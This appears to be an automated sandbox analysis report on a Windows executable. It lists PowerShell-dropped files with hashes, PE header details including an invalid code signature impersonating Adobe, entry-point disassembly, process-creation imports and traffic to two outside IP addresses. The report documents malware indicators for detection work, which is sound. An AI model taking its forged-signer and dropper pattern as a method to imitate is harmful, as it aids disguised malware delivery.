                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                              Malicious:false
                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:PDF document, version 1.7, 1 pages
                                                              Category:dropped
                                                              Size (bytes):126079
                                                              Entropy (8bit):7.943849374898452
                                                              Encrypted:false
                                                              SSDEEP:3072:491AUlpumVlx1KDctCivx/JII6GE2XAYX:7wFVlxtvxXE2XL
                                                              MD5:883B3959460633ADD1FDDEB2B3060765
                                                              SHA1:A70C7DEB8F428678A43156C08267568984D0B712
                                                              SHA-256:82C26B4F1DE6AC3DB8689BDF21D64B63837DF027F37EA6878F799B5CB4D65596
                                                              SHA-512:EFCC6208349802B6EC36DF856718AD91C63A6D13FDBA712635D84A880269C0357B009D8A710B2CFECEB77AE07B46DC9BC84F4053F4E45C56FE4778A5A464E7BF
                                                              Malicious:false
                                                              Preview:%PDF-1.7.%.....1 0 obj .<<./ColorSpace /DeviceRGB./Subtype /Image./Height 1083./Filter /FlateDecode./Type /XObject./Width 851./BitsPerComponent 8./Length 125221.>>.stream.x...e.$..q\.{..................].w..n..Cp. y...../gU...cHf_.f..]ud.-.SU.S.%I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I..*~....=.$I.$I.....W_..CH.$I.$I~.......!$I.$I.$I.$I.$I.$I.$I.$I.$I.$I.$I2@|..}...{.{...[n....r.SO=....kp.-I.$I.?/....?.O?....|....{pO:I.$I.dHd...Z..b.5..K~...=.$I.$I.!..g.q.:..J..f.].7.x..tP.NN.$I.$.`!..Xc....n6h.h...o..F.)._.$I.$.`$..4.L...O.7hx...9...2._.$I.$.`...z....G........
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6220
                                                              Entropy (8bit):3.7217410808888496
                                                              Encrypted:false
                                                              SSDEEP:48:QrUIxUI9QuCnU2bHJvwwukvhkvklCyw0NoYHVlUWGSogZoQtoYHVlKGSogZoE1:yhSuQuCUQZgkvhkvCCtkLHVRH3LHVqHz
                                                              MD5:C2FB90572F64723E427E5E0F000C54F4
                                                              SHA1:B3AE2ECF901329D54CEBD34747DAC3D418F49E74
                                                              SHA-256:9C7F88715E19911EF3D9BAE874E1B09322164034F5D27A5237E1FCD79CC31374
                                                              SHA-512:49219AB865457647197309F4BB6435929CE798D036F2986825BB5DFBB0F94EEB0D48226A5A9A94859B7716CB81A1EB7FF4D558B68C97B804BFA06E3F5EBE0BA2
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ....'GDj........G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....Zu..G.......G......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.u..........................=...A.p.p.D.a.t.a...B.V.1......Y.u..Roaming.@......EWsG.Y.u...........................pq.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.u..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.u...........................{..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.u....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.u....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.u................
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6220
                                                              Entropy (8bit):3.7217410808888496
                                                              Encrypted:false
                                                              SSDEEP:48:QrUIxUI9QuCnU2bHJvwwukvhkvklCyw0NoYHVlUWGSogZoQtoYHVlKGSogZoE1:yhSuQuCUQZgkvhkvCCtkLHVRH3LHVqHz
                                                              MD5:C2FB90572F64723E427E5E0F000C54F4
                                                              SHA1:B3AE2ECF901329D54CEBD34747DAC3D418F49E74
                                                              SHA-256:9C7F88715E19911EF3D9BAE874E1B09322164034F5D27A5237E1FCD79CC31374
                                                              SHA-512:49219AB865457647197309F4BB6435929CE798D036F2986825BB5DFBB0F94EEB0D48226A5A9A94859B7716CB81A1EB7FF4D558B68C97B804BFA06E3F5EBE0BA2
                                                              Malicious:false
                                                              Preview:...................................FL..................F.".. ....'GDj........G..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj....Zu..G.......G......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y.u..........................=...A.p.p.D.a.t.a...B.V.1......Y.u..Roaming.@......EWsG.Y.u...........................pq.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsG.Y.u..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsG.Y.u...........................{..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsG.Y.u....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsG.Y.u....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsG.Y.u................
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):55
                                                              Entropy (8bit):4.306461250274409
                                                              Encrypted:false
                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                              Malicious:false
                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                              Entropy (8bit):7.748470243900274
                                                              TrID:
                                                              • Win64 Executable (generic) (12005/4) 74.95%
                                                              • Generic Win/DOS Executable (2004/3) 12.51%
                                                              • DOS Executable Generic (2002/1) 12.50%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                              File name:lg1wwLsmCX.exe
                                                              File size:64'456 bytes
                                                              MD5:1ceb5d0cb063290c1f66fccfed96a220
                                                              SHA1:09b735e87dd4ef4917d2e1bcd969408c3ac099fd
                                                              SHA256:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9
                                                              SHA512:4e17a9d98c1ea9db1f330d7475bed55a0c662ce5e546145eb8c1973fdf702571179a51ba39aa2c983f8ce42aa6edb1a72f1a20e9f7de78950f94076edc9527d0
                                                              SSDEEP:1536:sOzhJIRg5Xji0araoUBeV9aE4f2bmKF60N+92+na7RGJfx:sAICkZQ+gT4+aVG
                                                              TLSH:BD53F1B987441CE0C52E9B7421DA467E59B5B25672C1831372BFA4208FE8743BBBF780
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...eD............/...........................@..............................................G@......t...............J.....
                                                              Icon Hash:bdb5bd98b3f39807
                                                              Entrypoint:0x4011c0
                                                              Entrypoint Section:T10B924G
                                                              Digitally signed:true
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                              DLL Characteristics:NO_SEH
                                                              Time Stamp:0x1F8A4465 [Wed Oct 8 11:32:53 1986 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f41f41af65e0c95c3d701cfd7af8b14a
                                                              Signature Valid:false
                                                              Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                              Signature Validation Error:The digital signature of the object did not verify
                                                              Error Number:-2146869232
                                                              Not Before, Not After
                                                              • 03/11/2023 00:00:00 04/11/2025 23:59:59
                                                              Subject Chain
                                                              • CN=Adobe Inc., OU=Acrobat 11, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                              Version:3
                                                              Thumbprint MD5:DE33CDD57B201C17BA1D948F9027EA38
                                                              Thumbprint SHA-1:8E5C0EF19E4319A5161B04C5179899335768CCC0
                                                              Thumbprint SHA-256:66048B4FFA7CEC38A851BD978E87BC469612964C9319C94005AC0FA060A6CE65
                                                              Serial:0E6E32FCB0E03A0C0B2BC04B56F2038B
                                                              Instruction
                                                              push ebp
                                                              dec eax
                                                              mov ebp, esp
                                                              dec eax
                                                              sub esp, 00000050h
                                                              mov eax, 00000000h
                                                              mov dword ptr [ebp-20h], eax
                                                              mov edx, 00030000h
                                                              mov ecx, 00010000h
                                                              call 00007F785494EC43h
                                                              mov ecx, 00000001h
                                                              call 00007F785494EC41h
                                                              dec eax
                                                              lea eax, dword ptr [ebp-20h]
                                                              dec eax
                                                              mov dword ptr [esp+20h], eax
                                                              mov eax, 00000000h
                                                              dec ecx
                                                              mov ecx, eax
                                                              dec eax
                                                              lea eax, dword ptr [ebp-18h]
                                                              dec ecx
                                                              mov eax, eax
                                                              dec eax
                                                              lea edx, dword ptr [ebp-10h]
                                                              dec eax
                                                              lea ecx, dword ptr [ebp-04h]
                                                              call 00007F785494EC24h
                                                              dec eax
                                                              mov eax, dword ptr [ebp-18h]
                                                              dec ecx
                                                              mov eax, eax
                                                              dec eax
                                                              mov edx, dword ptr [ebp-10h]
                                                              mov ecx, dword ptr [ebp-04h]
                                                              call 00007F785494E9A1h
                                                              mov dword ptr [ebp-1Ch], eax
                                                              mov ecx, dword ptr [ebp-1Ch]
                                                              call 00007F785494EC0Eh
                                                              leave
                                                              ret
                                                              add byte ptr [eax], al
                                                              add byte ptr [ecx], al
                                                              add al, 02h
                                                              add eax, 50010304h
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FD6h]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FFEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FFEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FFEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FBEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FBEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FBEh]
                                                              add byte ptr [eax], al
                                                              jmp dword ptr [00000FBEh]
                                                              add byte ptr [eax], al
                                                              adc byte ptr [ebp+71h], bh
                                                              mov byte ptr [ecx], al
                                                              pushad
                                                              and dh, byte ptr [edi+00h]
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x21e00x3cG8MCUXOZ
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000xc094SRW4MTG9
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x30000x18Z2TXZQUP
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xd2000x29c8SRW4MTG9
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x221c0x50G8MCUXOZ
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              T10B924G0x10000x2e90x400e60db9a21caf1bda7fd66724d6240776False0.392578125data3.828984910677204IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              G8MCUXOZ0x20000x3600x4009ba3852e83d41097503573521acac7b9False0.333984375data4.143245199340312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              Z2TXZQUP0x30000x180x200842ad4dd96cd5979a8d9cfca400a4eb1False0.0546875data0.2272518948570176IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              SRW4MTG90x40000xc0940xc2004d22c53c08a4da3f9079e168b3ca93ceFalse0.9779719716494846data7.871980812241951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0x40b80xbfc5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9867598231927158
                                                              RT_GROUP_ICON0x100800x14data1.1
                                                              DLLImport
                                                              msvcrt.dllmemset, _controlfp, __set_app_type, __getmainargs, exit
                                                              kernel32.dllCreateProcessA, WaitForSingleObject, CloseHandle
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 6, 2024 15:46:33.435518026 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:33.435568094 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:33.435623884 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:33.448215961 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:33.448245049 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:34.843921900 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:34.844001055 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:34.848283052 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:34.848294973 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:34.848680973 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:34.855680943 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:34.903328896 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.384768009 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.384799004 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.384888887 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.384922028 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.428896904 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.496285915 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.496305943 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.496371031 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.496408939 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.602927923 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.603064060 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.603138924 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.628170013 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.628326893 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.628367901 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.641913891 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.642060995 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.642090082 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.661807060 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.661863089 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.661941051 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.661951065 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.661974907 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.710166931 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.776334047 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.776348114 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.776375055 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.776417971 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.776448965 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.793514013 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.793530941 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.793678045 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.793698072 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.806876898 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.806910992 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.806952953 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.806973934 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.807014942 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.815928936 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.815988064 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.816006899 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.829207897 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.829221010 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.829282045 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.829302073 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.840646029 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.840665102 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.840734005 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.840753078 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.852010965 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.852025032 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.852094889 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.852108002 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.861280918 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.861294031 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.861368895 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.861386061 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.867438078 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.867522001 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.867538929 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.913321972 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.972336054 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.972349882 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.972373009 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.972451925 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.980093002 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.980103016 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.980134964 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.980169058 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.980186939 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:35.980195999 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.980220079 CET44349718101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:35.980266094 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:36.005330086 CET49718443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:45.324609041 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:45.324642897 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:45.324769020 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:45.324870110 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:45.324883938 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:46.740269899 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:46.909579039 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:46.909610987 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:46.910907984 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:46.910921097 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:46.910964966 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:46.910974979 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:46.911010027 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:46.933001995 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:46.933166027 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:46.933311939 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:46.979325056 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:47.046592951 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:47.046605110 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:47.249715090 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:47.373769045 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:47.373943090 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:47.374006987 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:47.377651930 CET49758443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:47.377686024 CET4434975850.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:47.380889893 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:47.380935907 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:47.381062031 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:47.381256104 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:47.381267071 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:47.477679014 CET49768443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:47.477713108 CET44349768101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:47.477777958 CET49768443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:47.481471062 CET49768443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:47.481482983 CET44349768101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:48.793065071 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:48.793498039 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:48.793520927 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:48.794612885 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:48.794694901 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:48.794703960 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:48.794751883 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:48.795113087 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:48.795180082 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:48.795264959 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:48.795279026 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:48.875144958 CET44349768101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:48.875240088 CET49768443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:48.878096104 CET49768443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:48.878106117 CET44349768101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:48.878432989 CET44349768101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:48.895822048 CET49768443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:48.937237978 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:48.939321995 CET44349768101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:49.313277960 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:49.313294888 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:49.313369989 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:49.313384056 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:49.313394070 CET4434976750.16.47.176192.168.2.9
                                                              Dec 6, 2024 15:46:49.313431025 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:49.418998957 CET44349768101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:49.419070005 CET44349768101.99.75.174192.168.2.9
                                                              Dec 6, 2024 15:46:49.419238091 CET49768443192.168.2.9101.99.75.174
                                                              Dec 6, 2024 15:46:49.489603996 CET49768443192.168.2.9101.99.75.174
